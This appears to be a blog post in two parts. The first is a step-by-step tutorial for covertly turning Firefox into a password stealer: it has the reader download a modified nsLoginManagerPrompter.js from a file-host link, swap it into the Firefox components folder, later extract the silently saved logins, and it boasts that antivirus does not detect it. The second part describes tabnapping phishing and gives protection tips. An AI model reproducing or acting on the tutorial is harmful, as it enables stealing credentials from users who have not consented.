Convert Firefox Into Password Stealer
keylogger can store all the usernames and passwords of mozilla firefox without the user’s consent.
How this Keylogger Works?
Whenever you login into any website using mozilla firefox browser it always ask’s you whether you want to Save password or not for that website.
We will be using a script that will not give the user option to save the password instead it will automatically save the passwords without user’s consent and we will retrieve them later.
Can this be detected by antivirus?
I have scanned it with Mcafee,Norton and Avast and it is totally undetectable.
Does It work on all websites?
It is working on almost all websites like facebook,hotmail,reddit and digg.But this trick somehow failed on Gmail.
Now I will give you the step by step tutorial on how to use this trick
1. Download this script here
DOWNLOAD URL:- http://hotfile.com/dl/110066569/8ceecf5/firefoxscript.rar.html
2. Now go to the following address
If you are Windows user then goto
C:/Program Files/Mozilla Firefox/Components
If you are MAC user then goto
Applications > Right click Firefox > Show Package Contents >Contents/MacOS/Components
1. Now find a file nsLoginManagerPrompter.js and copy it to somewhere safe location because we will be
replacing this file in next step.
2. Extract the script folder that you have downloaded in first step and copy and paste
thensLoginManagerPrompter.js from the folder to the folder mentioned in step 2.
3. So now your firefox keylogger is ready.Now Each and every username and password will be automatically
saved.
The next step is to retrieve the username and passwords that have been stored in your firefox browser.
It is very easy to retrieve the password from firefox using firepasswordviewer.
Web Browser Attack-TabNapping
We are living in the jungle of web, we have different web-browser to view internet websites. Different vulnerability on browser's arising every day and you have to be aware these new attack to protect your infrastructure. As you know in the phishing attacker send a URL to the victim and victim has to click on URL to go on phishing page, now the thing is change a new term has been discovered that is TabNapping, tabnapping is a web-browser attack and the new way of phishing attack in which victim not require to click any URL. In this attack one of you browser tab replace with another page without your knowledge and permission, for example in one of your browser tab you have opened any website it will automatically replaced with the phishing side and the normal user's does not look to the URL. Instead of explain all the stuff here on text format i want to share a video demonstration of tabnapping.
Protection
1.Do not login on any tab, that you have not open it by yourself.
2.Look around the URL before login to any website.
3.If you find any suspicious than close the tab and open new one.
4.Update your browser.
5.Do not open many tab while you are working on your secure website or
important websites.
No comments:
Post a Comment